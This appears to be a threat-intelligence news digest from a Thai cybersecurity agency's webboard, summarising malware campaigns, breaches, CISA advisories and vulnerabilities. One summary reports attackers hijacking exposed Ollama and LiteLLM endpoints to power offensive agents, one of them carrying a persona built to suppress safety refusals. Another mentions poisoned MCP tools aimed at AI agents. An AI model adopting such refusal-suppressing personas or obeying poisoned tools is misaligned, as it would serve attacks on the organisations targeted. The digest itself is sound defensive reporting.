        https://cyberscoop.com/ransomware-syndicates-corporate-organization-op-ed/
        Operation Navy Ghost: How Attackers Planted a Telegram-Powered Backdoor Across Fake * Pyrogram Packages On PyPI
        "A threat actor targeted Telegram bot developers adopting the popular ‘pyrogram’ package on PyPI over the course of six months starting November 2025, in Operation Navy Ghost. This malware is a complete backdoor on servers where infected bots are operated, and uses Telegram itself for C2 and data exfiltration. Learn how it works, how it sneaks by most scanners, and how to detect infections."
        https://checkmarx.com/zero-post/operation-navy-ghost-pyrogram-telegram-supplychain-attack/
        https://www.bleepingcomputer.com/news/security/malicious-pypi-packages-give-hackers-control-of-telegram-bot-servers/
      • The Bear Necessities: A Look At The Drivers, Dynamics, And Applications Of The Pro-Russia Influence Ecosystem
        "Four years into Russia’s full-scale invasion of Ukraine, the pro-Russia influence ecosystem has evolved from a tool of war back into a global strategic asset. Since the mobilization of this ecosystem to support frontline objectives, we have witnessed the expedited development of new influence assets linked to multiple, expansive, covert information operations (IO) campaigns and a revitalization of pro-Russia hacktivism at an unprecedented scale. While this threat activity initially adapted to encompass Ukraine-related priorities, it is gradually pivoting back to established Russian influence objectives for which the ecosystem was originally honed."
        https://cloud.google.com/blog/topics/threat-intelligence/pro-russia-influence-ecosystem
        https://www.bankinfosecurity.com/google-kremlin-expands-ai-backed-campaigns-across-europe-us-a-32120
      • Glitch SPY: An Emerging Android RAT Distributed Through a Fake Polish Rental App
        "Cyble Research and Intelligence Labs identified an emerging Android malware family tracked as Glitch SPY, distributed through a fraudulent Polish apartment and house rental platform designed to lure users into downloading an Android APK. Based on the Polish-language lure and rental-themed distribution website, the activity appears to be Poland-focused, targeting users in Poland or Polish expats."
        https://cyble.com/blog/glitch-spy-rat-distributed-via-fake-polish-app/
      • Bring Your Own Agent: Hijacking Exposed AI Backends To Power Offensive Operations
        "Some abuse of an internet-exposed AI server can be mundane: someone finds free inference and runs a chatbot on your bill. The cases below are different. Between March and May 2026, our honeypot sensors caught three separate operators hijacking our exposed Ollama and LiteLLM endpoints as the model backend for offensive tooling. Two were autonomous penetration-testing frameworks ("Strix" and "HexStrike AI"), and the third was an OpenAI Codex agent carrying a persona built to suppress safety refusals and assisting in web reverse-engineering work."
        https://labs.zenity.io/p/bring-your-own-agent-hijacking-exposed-ai-backends-to-power-offensive-operations
        https://www.darkreading.com/cloud-security/attackers-hijack-exposed-ai-endpoints-power-offensive-ops
      • New EvilTokens Attack Exposes Browser Visibility Gap In Enterprise SOCs
        "A new EvilTokens attack shows how modern phishing can hide critical evidence from enterprise SOCs until the page runs inside the browser. The case highlights a growing visibility gap in phishing triage: suspicious URLs may appear incomplete at first, while the real account takeover flow is revealed only after execution. For security leaders, that gap can mean slower investigations, delayed response, and higher business risk."
        https://hackread.com/eviltokens-attack-browser-visibility-gap-enterprise-socs/
      • ToddyCat: Your Hidden Email Assistant. Part 2
        "We continue to share details on the malicious techniques and toolsets used by the ToddyCat APT group. In the first part of this report, we examined the group’s attacks aimed at stealing data from browsers, as well as from local and cloud email services. The methods used in that campaign indicated that ToddyCat was attempting to access corporate correspondence while evading monitoring tools. However, all of the group’s methods we described previously are effectively detected by EPP and EDR solutions."
        https://securelist.com/toddycat-apt-umbrij-tool-and-oauth/120251/
      • RustDuck: An In-Depth Analysis Of a Two-Stage Botnet
        "Since February 2026, the XLAB large-scale network threat perception system has detected a new malware family active in cyberspace that adopts a Loader + Core (two-stage loading) architecture. Currently, the family has spawned multiple variants, with the main core functionality being the execution of large-scale Distributed Denial-of-Service (DDoS) attacks. It also possesses strong cross-platform adaptability and continuous evolution capabilities."
        https://blog.xlab.qianxin.com/rustduck-en/
        https://thehackernews.com/2026/06/rustduck-botnet-rebuilds-in-rust-to.html
      • Silent Swap: A Crypto Clipper Extension Campaign
        "McAfee Advanced Threat Research has identified an active browser-extension campaign designed to steal cryptocurrency by silently substituting wallet addresses the moment a user initiates a transaction. The campaign is delivered through unsigned installers — observed in both .NET and Golang variants — that deploy a malicious Chromium extension masquerading as a benign “Google Notes” utility."
        https://www.mcafee.com/blogs/other-blogs/mcafee-labs/crypto-clipper-wallet-swapping-browser-extension-malware/
        https://thehackernews.com/2026/06/silent-swap-crypto-clipper-uses-fake.html
      • INC Ransomware Targets Mainframes: Exposed Servers Reveal Cross-Platform Payloads And APAC Campaign
        "A recent infrastructure exposure provided a rare look into an active INC ransomware affiliate targeting the Asia-Pacific region. In mid-June 2026, a pair of open directories were identified on AEZA Group LLC, a known bulletproof hosting environment, revealing an operational staging server. The exposed directories contained Windows and Linux encryptors, Group Policy Object (GPO) deployment scripts for a Japanese food and beverage company, and 675 MB of operator tooling, and exfiltrated victim data. Together, these findings offered a unique view into an active ransomware campaign in near real-time."
        https://cyberandramen.net/2026/06/24/inc-ransomware-targets-mainframes-exposed-servers-reveal-cross-platform-payloads-and-apac-campaign/

      Breaches/Hacks/Leaks

      • Insurance Giant Aflac Discloses Data Breach After Subsidiary Hack
        "American insurance giant Aflac has disclosed a new data breach after attackers breached its Japan subsidiary's systems and stole personal and bank account information. Aflac (short for American Family Life Assurance Company) is a Fortune 500 company and the largest supplemental insurance provider in the United States, serving millions of customers in the U.S. and Japan. In a filing with the U.S. Securities and Exchange Commission (SEC) on Monday, the company revealed that threat actors gained access to Aflac Japan's systems earlier this month."
        https://www.bleepingcomputer.com/news/security/insurance-giant-aflac-discloses-data-breach-after-subsidiary-hack/
        https://www.securityweek.com/aflac-japan-data-breach-impacts-4-38-million/
        https://securityaffairs.com/194488/data-breach/hackers-steal-data-of-4-38-million-aflac-japan-customers.html

      General News

      • Shadow AI Is Not a Tool Problem. It’s a Timing Problem.
        "Most AI policies are written in the future tense. Employees use AI in the present tense. That gap explains a lot about shadow AI. A governance committee may still be defining good AI use. Meanwhile, AI has already become part of how work moves: in the browser, inside SaaS platforms, and across everyday applications. The mismatch is not only organizational. It is temporal."
        https://blog.checkpoint.com/ai-security/shadow-ai-is-not-a-tool-problem-its-a-timing-problem/
      • Vulnerability Reports Are Arriving Faster Than GitHub Can Review Them
        "Across the open source world, people are reporting software flaws in record numbers, and the systems built to verify those reports are straining under the weight. The GitHub Advisory Database, which feeds automated security alerts to millions of projects, has reached a point where some new advisories take weeks to publish. In May 2026, the database published 1,560 reviewed advisories, the most in its history and several times its usual monthly output. The volume still fell short of what arrived."
        https://www.helpnetsecurity.com/2026/06/30/github-advisory-database-review/
      • Half The Defense Base Still Builds Security Around Compliance
        "CMMC requirements are appearing in defense contracts and moving down through supplier networks to thousands of companies new to this kind of compliance work. Many run on limited budgets with lean security teams. The picture comes from nearly 900 defense contractors, C3PAOs, federal suppliers, and cybersecurity professionals who attended the 2026 Secureframe National Cybersecurity Summit."
        https://www.helpnetsecurity.com/2026/06/30/federal-cybersecurity-compliance-report/
      • Over 300 UK Firms Hit By Ransomware In a Year
        "UK organizations suffered more than 26 successful ransomware attacks each month last year, with SMEs hit hardest, according to new data from Report Fraud. The UK’s cybercrime and fraud reporting service was contacted by 323 corporate ransomware victims between April 2025 and March 2026, according to City of London Police. Over 50% of reports were from small and mid-sized companies. Financial losses associated with these incidents increased 50% annually to around £270,000 ($357,000), although the police force admitted this was likely an underestimate given many businesses do not fully disclose the figure."
        https://www.infosecurity-magazine.com/news/over-300-uk-firms-hit-ransomware/
      • What’s The Difference Between Credential Theft And Session Hijacking?
        "Credential theft targets login details: Attackers steal usernames and passwords to access accounts, often through phishing or social engineering. Session hijacking targets active access: Attackers steal or manipulate session tokens to impersonate users who have already logged in. Multifactor authentication (MFA) helps, but it isn’t foolproof: Session hijacking can bypass MFA because the attacker is exploiting an already-authenticated session. Stopping these attacks requires layered defenses: Strong authentication, encryption, session monitoring, device checks, and user training all play a role."
        https://blog.barracuda.com/2026/06/29/credential-theft-vs-session-hijacking
      • UK Healthcare Sector Records Tenfold Increase In Cyber-Attacks
        "The UK’s healthcare sector is being “stress-tested to breaking point," with a tenfold increase in attacks during January-May 2026 compared to the whole of 2025, according to SonicWall. The security vendor’s data comes from its intrusion prevention system (IPS) sensors dispersed across UK healthcare clients. They recorded 264,000 individual events in the first five months of the year compared to just 27,000 for 2025."
        https://www.infosecurity-magazine.com/news/uk-healthcare-tenfold-increase/
      • Accelerating The Quantum-Safe Timeline
        "For years, planning for post-quantum cryptography (PQC) was framed as a future problem: important, inevitable, but distant. That perspective is evolving as technology advances and organizations prepare for the scale and complexity of the transition ahead. At Microsoft, we are acting on this shift by bringing our quantum-safe timeline forward so organizations can begin the transition earlier and with greater confidence."
        https://www.microsoft.com/en-us/security/blog/2026/06/30/microsoft-advances-quantum-safe-security-as-the-risk-timeline-shifts/
        https://www.bleepingcomputer.com/news/microsoft/microsoft-accelerates-quantum-safe-roadmap-as-risks-grow/
      • Communications Security Establishment Canada Annual Report 2025-2026
        "For 80 years, the Communications Security Establishment Canada (CSE) has used its expertise in signals intelligence to keep Canada and Canadians safe. As technology has evolved, so has CSE’s role. Through our Canadian Centre for Cyber Security (Cyber Centre), we now provide authoritative, practical advice and technical guidance to help Canadian individuals, businesses, various levels of government and critical infrastructure stay safe from cyber threats. Together, we are Canada’s digital frontline of defence."
        https://www.cse-cst.gc.ca/en/accountability/transparency/reports/communications-security-establishment-canada-annual-report-2025-2026
        https://www.bankinfosecurity.com/russian-water-system-hack-attempted-to-turn-canada-dry-a-32122
      • AI-Generated Workflows Are a Silent Security Disaster
        "A security analyst at a large enterprise recently found sensitive HR documents being copied into a Microsoft Teams channel that hundreds of employees could access. It was not caused by a malicious insider, a compromised admin account, or a sophisticated attacker. It was caused by a Power Automate workflow. The workflow had been created by a developer who wanted to automate document approvals between SharePoint and Teams. To move faster, the developer used an AI assistant to generate the automation logic. Functionally, the workflow worked. Documents moved from one location to another. Notifications were sent. The approval process became faster."
        https://www.darkreading.com/cyber-risk/ai-generated-workflows-silent-security-disaster
      • Two Months In: Assessing The Impact Of NIST's Enrichment Cutbacks
        "On April 15, NIST announced that it would no longer attempt enrichment for every CVE. Vulnerabilities are still ingested by the National Vulnerability Database, but enrichment is now reserved for a selected subset. Everything else will be marked as Not Scheduled. That may sound strategic, but is actually problematic. For years, NIST established itself as an authoritative source of vulnerability data. Teams have come to rely on their assessment of CVSS, CWE, and CPE for vulnerability management and automation."
        https://blog.volerion.com/posts/two-months-in-nist-cuts-back-on-enrichment-efforts/
        https://www.darkreading.com/vulnerabilities-threats/nist-enrichment-reductions-cve-coverage-accuracy
      • Singapore Cyber Landscape 2025/2026
        "The cybersecurity landscape over the past year was defined by several prominent trends, underpinned by a threat environment of growing complexity, speed, scale, and sophistication. Key among the drivers of these trends were the proliferation and accessibility of artificial intelligence, as well as the interdependencies inherent in modern supply chains. In line with global trends, Singapore’s cyber landscape saw an increase in ransomware attacks. Locally, there was also a notable rise in the number of infected systems, driven primarily by an expanded attack surface stemming from the increasing adoption of Malware-as-a-Service (MaaS) operations, and the proliferation of consumer-grade Internet-of-Things (IoT) devices with unpatched firmware or default passwords."
        https://www.csa.gov.sg/resources/publications/singapore-cyber-landscape-2025-2026/
      • What's Trending: Top Cyber Attacker Techniques, March - May 2026
        "Between March 1 and May 31, 2026 (“the reporting period”), attackers achieved their objectives by exploiting trusted identities, devices, and tools rather than malicious code. Because their activity resembled normal behavior, traditional perimeter and file-scanning defenses often failed to catch it. Adversaries leaned on two strategies: social engineering at scale and attacks on unpatched, internet-facing infrastructure. The leading technique “ClickFix” drove the first, shifting delivery from compromised websites to emailed links, while “Qilin,” the period’s most active ransomware operator, continued exploiting unpatched edge devices for mass extortion. What’s more, AI is making social engineering faster, cheaper, and more convincing, accelerating familiar techniques rather than creating new ones."
        https://reliaquest.com/blog/threat-spotlight-whats-trending-top-cyber-attacker-techniques-march-may-2026
        https://www.infosecurity-magazine.com/news/clickfix-cybercriminals-favorite/
      • Securing AI Agents: When AI Tools Move From Reading To Acting
        "As enterprise deployments mature, some enterprise AI agents are shifting from reading content to taking action. In this post, Microsoft Incident Response walks through an attack pattern that targets the fastest growing part of the agentic AI supply chain: Model Context Protocol (MCP) tools. The post provides a practical playbook for detecting, containing, and preventing this class of attack using Microsoft security controls."
        https://www.microsoft.com/en-us/security/blog/2026/06/30/securing-ai-agents-ai-tools-move-from-reading-acting/
        https://thehackernews.com/2026/06/microsoft-warns-poisoned-mcp-tool.html
      • What The Numbers Say About FIFA 2026 Cyber Risk
        "The FIFA World Cup 2026 opened on June 11. By that date, according to Check Point Research, the fraud infrastructure targeting it had already been built, staged, and partially deployed. Threat actor activity was pre-planned, months out, across three sectors and at least ten languages. Check Point Exposure Management published the FIFA World Cup 2026 Cyber Threat Report this month, covering financial services, transportation, hospitality, and gambling. Here are three findings worth reading carefully."
        https://thehackernews.com/2026/06/what-numbers-say-about-fifa-2026-cyber.html
        https://checkpoint.cyberint.com/fifa-report-2026
      • Hacker Conversations: Chris Thompson, Former Head Of IBM X-Force Red, Co-Founder Of RemoteThreat
        "From bad game hacker to an elite good red team hacker. Chris Thompson is a hacker. His journey took him from hacking game controls as a teenager to become the founder of IBM’s first dedicated red team and then global head of X-Force Red. In 2024 he founded and remains the organizer of Offensive AI Con, and in 2025 moved from IBM to be co-founder and CEO at RemoteThreat."
        https://www.securityweek.com/hacker-conversations-chris-thompson-former-head-of-ibm-x-force-red-co-founder-of-remotethreat/
      • The AI Token Costs That Can Break Cybersecurity
        "Imagine this scenario. It’s Tuesday night at 11:47 PM. Your senior SOC analyst is pulled into a critical, high-severity alert. A primary Domain Controller has flagged a deeply anomalous administrative command sequence originating from a mid-level employee’s standard workstation. The analyst triggers “agents” on the organization’s cybersecurity platform to assist with her investigation: mapping the account’s full authentication timeline, cross-referencing internal network logs, scanning active threat intelligence feeds, constructing secondary lookup queries to hunt for lateral movement. The investigation is moving at machine speed."
        https://www.securityweek.com/the-ai-token-costs-that-can-break-cybersecurity/
      • XSS Forum: From DaMaGeLaB To The 2025 Takedown
        "XSS[.]is, the most influential Russian-language cybercrime forum of the past decade and the direct heir to the legacy board DaMaGeLaB, lost its administrator on 22 July 2025 when French and Ukrainian police arrested a 38-year-old man in Kyiv. Europol, which coordinated Operation Ratatouille, said the forum had more than 50,000 members and that the suspect earned over EUR 7 million arbitrating deals between criminals. The Ransomnews Research Team analysed a leaked copy of the forum database, 123,241 messages across 51 trading sections, to show exactly how the marketplace worked and where it sat in the ransomware kill chain."
        https://ransomnews.com/xss-forum-damagelab-takedown-2025/
        https://securityaffairs.com/194524/security/xss-is-the-forum-that-ran-the-ransomware-supply-chain-is-down-the-market-isnt.html

      อ้างอิง

      Electronic Transactions Development Agency (ETDA) 1a955c1f-3e2a-4cbd-950d-17d1dba3f03d-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • CISA เพิ่มช่องโหว่ที่ถูกใช้โจมตี 1 รายการลงในแคตตาล็อก

      เมื่อวันที่ 30 มิถุนายน 2569 Cybersecurity and Infrastructure Security Agency (CISA) ได้เพิ่มช่องโหว่ใหม่ 1 รายการลงในแคตตาล็อก Known Exploited Vulnerabilities (KEV) จากหลักฐานที่พบว่ามีการโจมตีใช้งานจริงแล้ว มีรายละเอียดดังนี้

      CVE-2026-48558 SimpleHelp Authentication Bypass Vulnerability

      ทาง CISA จะปรับปรุงและเพิ่มช่องโหว่ใหม่เข้าสู่แคตตาล็อก KEV อย่างต่อเนื่อง เพื่อให้ครอบคลุมความเสี่ยงที่ตรวจพบจริงในปัจจุบันและอนาคต

      อ้างอิง

      https://www.cisa.gov/news-events/alerts/2026/06/29/cisa-adds-one-known-exploited-vulnerability-catalog

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand c060ee52-f684-413e-a20c-6060fc527f48-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • CISA เผยแพร่คำแนะนำด้านระบบควบคุมอุตสาหกรรม (ICS) จำนวน 8 รายการ

      Cybersecurity and Infrastructure Security Agency (CISA) ได้เผยแพร่คำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม (ICS) จำนวน 8 รายการ เมื่อวันที่ 30 มิถุนายน 2569 เพื่อให้ข้อมูลที่ทันเวลาเกี่ยวกับประเด็นด้านความมั่นคงปลอดภัย ช่องโหว่ และการโจมตีที่เกี่ยวข้องกับระบบ ICS โดยมีรายละเอียดดังนี้

      ICSMA-26-181-01 OFFIS DCMTK Toolkit
      ICSA-26-181-01 Mitsubishi Electric MELSOFT Update Manager SW1DND-UDM-M
      ICSA-26-181-02 Frangoteam FUXA SCADA/HMIM
      ICSA-26-181-03 Schneider Electric EcoStruxure IT Data Center Expert
      ICSA-26-181-04 Schneider Electric EasyLogic T150 and Saitel DP RTU
      ICSA-26-181-05 XZ Utils vulnerability impacting B&R Products
      ICSA-26-181-06 StoneFly Storage Concentrator
      ICSA-26-181-07 Delta Electronics DVP12SE PLC

      อ้างอิง

      https://www.cisa.gov/news-events/ics-advisories ec64b602-6550-4cef-a28e-fa26cc95c2e4-image.png

      โพสต์ใน OT Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • สหรัฐฯ ยึดเกือบ 400 โดเมนเว็บสตรีมฟุตบอลโลกผิดกฎหมาย เตือนผู้ใช้เสี่ยงมัลแวร์และข้อมูลรั่วไหล

      สหรัฐฯ ยึดเกือบ 400 โดเมนเว็บสตรีมฟุตบอลโลก.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 0fa629fb-6c98-4677-9612-c05dd6936b80-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • KDDI เผยเหตุข้อมูลรั่วไหล กระทบบัญชีอีเมลสูงสุด 14.2 ล้านบัญชีของผู้ให้บริการอินเทอร์เน็ต 6 รายในญี่ปุ่น

      KDDI เผยเหตุข้อมูลรั่วไหล กระทบบัญชีอีเมลสู.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 23d36783-5beb-4604-bfcb-1b67149fbc33-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • OpenAI เปิดตัว GPT-5.6 Sol เป็น AI ขั้นสูงเพื่อความมั่นคงปลอดภัยไซเบอร์ มุ่งเน้นการตรวจจับช่องโหว่และงานเชิงรับ

      OpenAI เปิดตัว GPT-5.6 Sol เป็น  AI ขั้นสูงเพื่อความมั่น.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 3405978d-2519-4802-aad2-f1db4f7bd1d5-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • ETDA Cyber Threat Intelligence 30 June 2026

      Healthcare Sector

      • Pydicom Pynetdicom Library
        "Successful exploitation of this vulnerability could allow an unauthenticated attacker to write to arbitrary file paths."
        https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-176-01
      • OHIF Viewers DICOM
        "Successful exploitation of this vulnerability in a custom integration version could allow an attacker to steal an authenticated clinician's token via a crafted link."
        https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-176-02

      Industrial Sector

      • EVoke Systems Charging Station Management System
        "Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-176-02
      • Yokogawa FAST/TOOLS And CI Server
        "Successful exploitation of this vulnerability may return a response containing the CI Server setting information."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-176-01
      • Horner Automation Cscape
        "Successful exploitation of this vulnerability could allow a local attacker to disclose information and execute arbitrary code."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-176-03
      • Daktronics Controller Firmware
        "Successful exploitation of these vulnerabilities could could provide an unauthenticated user with complete root-level access and control of the system."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-176-04
      • H.VIEW HV-500S6 IP Camera
        "Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary code and upload malicious files to the affected device."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-176-05
      • Delta Electronics DTM Soft
        "Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-176-06
      • Schneider Electric PowerLogic P7
        "Schneider Electric is aware of a vulnerability in its PowerLogic™ P7 product. The PowerLogic™ P7 is a protection and control platform designed for complex and advanced electrical network applications. Failure to apply the remediation provided below may risk unauthorized execution of privileged commands or loss of HMI operability and configuration functionality, which could result in loss of control over system operations and disruption of critical services."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-176-07
      • Beware Of The License Manager: How a Schneider Electric Software Vulnerability Puts Industrial Facilities At Risk
        "The CVE-2024-2658 vulnerability was discovered in 2024 within the FlexNet Publisher component of the Schneider Electric Floating License Manager. This software handles license management across various Schneider Electric products used for comprehensive industrial automation ranging from PLC programming to centralized control room implementation. Below, we break down how a single flaw can jeopardize an entire industrial facility, how to detect it on your workstations, and how to minimize the risks. This vulnerability is a CWE-427: Uncontrolled Search Path Element issue. It stems from a system application referencing an OpenSSL configuration file at a hardcoded path without proper access controls."
        https://securelist.com/tr/schneider-electric-cve-2024-2658-vulnerability/120436/

      New Tooling

      • DarkMoon: Open-Source AI Pentesting Platform
        "Penetration testing has long run on expert time, with specialists spending days probing a network or web application by hand. Manual engagements stretch across weeks, expert consultants run into thousands of dollars a day, and results vary with the tester. Automation promises to narrow those gaps. A growing set of projects now hands the work to AI agents that plan and execute on their own. DarkMoon, an open-source platform, sits in that group. It runs a security assessment end to end and delivers an evidence-backed report at the finish."
        https://www.helpnetsecurity.com/2026/06/29/darkmoon-open-source-ai-pentesting-platform/
        https://github.com/ASCIT31/Dark-Moon

      Vulnerabilities

      • Public PoC Released For Critical Libssh2 CVE-2026-55200 Client-Side SSH Flaw
        "A public proof-of-concept is now out for CVE-2026-55200, a critical flaw in libssh2 that lets a malicious or compromised SSH server trigger memory corruption on a connecting client, with possible code execution. No credentials, no user interaction. The bug affects every release up to and including 1.11.1 and carries a CVSS 4.0 score of 9.2. libssh2 is a client-side SSH library, not a server. That distinction matters. It is embedded in curl, Git, PHP, backup agents, firmware updaters, and a long tail of appliances."
        https://thehackernews.com/2026/06/public-poc-released-for-critical.html
      • Hackers Now Exploit Critical Oracle E-Business Flaw In Attacks
        "Attackers have begun exploiting a critical vulnerability (tracked as CVE-2026-46817) in the Oracle E-Business Suite (EBS) financial application, according to threat intelligence company Defused. This security flaw was found in the File Transmission component of EBS's Oracle Payments product and enables unauthenticated malicious actors with HTTP network access to take over vulnerable systems through low-complexity attacks. Oracle released security updates to address the vulnerability with its May 2026 Critical Security Patch Update and urged customers to patch their systems immediately."
        https://www.bleepingcomputer.com/news/security/new-oracle-e-business-suite-flaw-now-exploited-in-attacks/
      • CISA Adds One Known Exploited Vulnerability To Catalog
        "CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2026-48558 SimpleHelp Authentication Bypass Vulnerability"
        https://www.cisa.gov/news-events/alerts/2026/06/29/cisa-adds-one-known-exploited-vulnerability-catalog

      Malware
      Hijacked Npm Packages Use Novel VSCode Autorun And Blockchain Dead Drops To Deploy a Credential/Crypto Stealer
      "Following our report, Nextron Research identified an additional 16 Go packages containing the same malware. Most appear to be legitimate packages whose latest released version included the malware alongside the original package contents, using the same structure and fake font file. The full list is available in the Go packages identified containing the same malicious payload section below. Some of the malicious packages are still live, even years after their commit timestamp."
      https://research.jfrog.com/post/hijacked-npm-vscode-tasks-blockchain/
      https://thehackernews.com/2026/06/hijacked-npm-and-go-packages-use-vs.html

      • A Djinn In The Machine: TaskWeaver’s Node.js Intrusion Chain
        "Blackpoint’s Adversary Pursuit Group (APG) investigated and contained an intrusion that began with the exploitation of CVE-2026-48558, a critical authentication bypass vulnerability affecting the OpenID Connect authentication flow in SimpleHelp Remote Monitoring and Management (RMM) software. By exploiting this vulnerability, the threat actor obtained an authenticated technician session on an internet-facing SimpleHelp server without possessing valid credentials. Using this access, the threat actor deployed two previously undocumented malware samples, which the APG has named TaskWeaver and Djinn Stealer."
        https://blackpointcyber.com/blog/a-djinn-in-the-machine-taskweavers-node-js-intrusion-chain/
        https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-simplehelp-flaw-deploy-new-djinn-infostealer-taskweaver-malware/
        https://www.darkreading.com/cyberattacks-data-breaches/djinn-stealer-targets-cloud-ai-credentials
      • Threat Intelligence Report: Nation-State Targeting Of Water Systems 2024–2026
        "Water and wastewater systems have become favored gray-zone targets because they are highly vulnerable and hold disproportionate strategic value. The combination of chronic underinvestment and weak baseline operational technology (OT) security make many of these critical systems easy to compromise. Such intrusions can have both physical and psychological impact, and disruptions often affect civilian life, public health, and trust in government. Recent nation-state cyber activity targeting water systems includes Iranian IRGC-linked targeting of exposed programmable logic controllers (PLCs), Russian and pro-Russian access to municipal water-control environments, and PRC-linked pre-positioning in U.S. critical infrastructure, including water and wastewater systems."
        https://dti.domaintools.com/research/threat-intelligence-report-nation-state-targeting-of-water-systems-2024-2026
        https://www.darkreading.com/ics-ot-security/iran-russia-china-target-water-systems-sabotage
      • 212 Domains Reference Venezuela’s Earthquake, Most Within Two Days
        "A small, high‑confidence set of current domain registrations that clearly reference the Venezuela earthquake, likely a fraction of the wider registration activity the event has driven, profiled across creation dates, registrars, registrant emails, name servers and naming intent. A magnitude‑7.2 foreshock and magnitude‑7.5 mainshock struck north‑central Venezuela on 24 June 2026; 50% of these domains were filed on 25 June alone, the day after. Full data access is available to verified organizations through our research and media collaborations program."
        https://threat-news.whoisxmlapi.com/2026-venezuela-earthquake
        https://hackread.com/venezuela-earthquake-domains-donation-scam-warnings/
      • Microsoft Removes 119 Edge Extensions That Hid Malware In Images And Fonts
        "Microsoft has shut down a long-running malicious extension operation on the Edge Add-ons store that hid its payloads inside ordinary image and font files, then woke up days after install to steal credentials and run ad fraud. The company calls it StegoAd, a mash-up of steganography and adware, and ties 119 extensions to a single threat actor it says has been active since at least 2021. The extensions were the kind people install without a second thought: ad blockers, VPNs, translators, video downloaders. Each one did its job and earned reviews. The malicious code stayed dormant until the extension cleared a stack of evasion checks, which is how it sat in the store for years."
        https://thehackernews.com/2026/06/microsoft-removes-119-edge-extensions.html
        https://microsoftedge.github.io/edgevr/assets/files/stego_ad/Microsoft_Edge_Security_StegoAd.pdf
        https://www.malwarebytes.com/blog/news/2026/06/119-edge-extensions-promised-useful-tools-instead-downloaded-malware
        https://securityaffairs.com/194409/malware/stegoad-how-119-fake-browser-extensions-stole-credentials-and-ran-ad-fraud-for-two-years.html
      • The Gentlemen Are Knocking: сustom Backdoors And Evolving Tactics
        "This year saw the emergence of The Gentlemen, a prominent example of a group operating under the ransomware-as-a-service (RaaS) model. Although our initial assessment suggested the group first appeared in mid-2025, it actually started ramping up its activities at the beginning of 2026. According to public reports, in the first half of 2026, this group ranks among the top 10 ransomware actors by the number of victim announcements on its data leak site (DLS)."
        https://securelist.com/the-gentlemen-raas/120447/
      • Chromium Extension Uses AI‑related Branding To Redirect Browser Search
        "Microsoft Threat Intelligence has identified a malicious Chromium-based extension that spoofs the AI-powered answer engine Perplexity AI to trick unsuspecting users into installing it. Based on our observation of the extension’s behavior, we assess its primary objective to be search traffic interception and data collection, which might enable downstream use cases such as profiling, targeted advertising, or other forms of misuse depending on operator intent. Through responsible disclosure, we reported this extension to Google, and it has been taken down as of this writing. We’d like to thank Google for responding to and addressing this issue."
        https://www.microsoft.com/en-us/security/blog/2026/06/29/chromium-extension-uses-airelated-branding-redirect-browser-search/
        https://thehackernews.com/2026/06/malicious-perplexity-chrome-extension.html
      • Mustang Panda Targets India's Government And Energy Sectors With ZOHOMURK And MINIRECON
        "Acronis TRU has identified two espionage-focused campaigns targeting India's hydropower sector and government entities, using lure documents themed around cooperation agreements between Indian and Taiwanese institutions. Both campaigns delivered previously undocumented DLL-based loaders, which we track as SHARDLOADER, through hydropower- and government-themed lure documents distributed in compressed archives. Upon execution, one SHARDLOADER variant decrypts and launches MINIRECON, a newly identified implant derived from the Toneshell malware family, while the second variant deploys ZOHOMURK, a novel implant that leverages legitimate cloud services for command-and-control, data exfiltration and remote task execution."
        https://www.acronis.com/en/tru/posts/mustang-panda-targets-indias-government-and-energy-sectors/
        https://thehackernews.com/2026/06/mustang-panda-uses-zoho-workdrive-as.html
      • TONResolver RAT Abuses TON Blockchain To Target Japan's Hotel Industry
        "In late May 2026, suspicious emails were identified being sent to Japanese partner companies of Booking.com, with the subject line “Important: Guest Stay Review Request” (重要:ゲスト滞在レビュー依頼). In this attack, a zip file was downloaded by accessing a hyperlink to a suspicious web site, and the infection began when the user clicked a shortcut link file (LNK) disguised as a photo file within the zip archive. Unlike conventional phishing campaigns, the malware abuses The Open Network (TON) blockchain platform as a dead drop resolver, a technique that allows attackers to update their command-and-control (C&C) server destination without hardcoding it into the malware, making detection and takedown significantly more difficult."
        https://www.trendmicro.com/en_us/research/26/f/tonresolver.html
      • A Multi-Stage Steganographic Loader Campaign Deploying Diverse Payloads Globally
        "During the routine telemetry monitoring, we identified a detection on a suspicious file named “GST Debit Note Apr_26.com”, based on the telemetry data observed. This prompted us to investigate the sample further. Our analysis revealed that the payload was a variant of the Remcos RAT malware family, distributed via a phishing campaign as an archive attachment. One notable characteristic of this infection chain was its reliance on in-memory execution techniques / fileless malware & Steganography. By avoiding disk-based artifacts, the threat reduces forensic evidence and increases its ability to evade traditional security tools and signature-based detection methods."
        https://labs.k7computing.com/index.php/a-multi-stage-steganographic-loader-campaign-deploying-diverse-payloads-globally/

      Breaches/Hacks/Leaks

      • Nissan Discloses Employee Data Breach Linked To Oracle Zero-Day Attacks
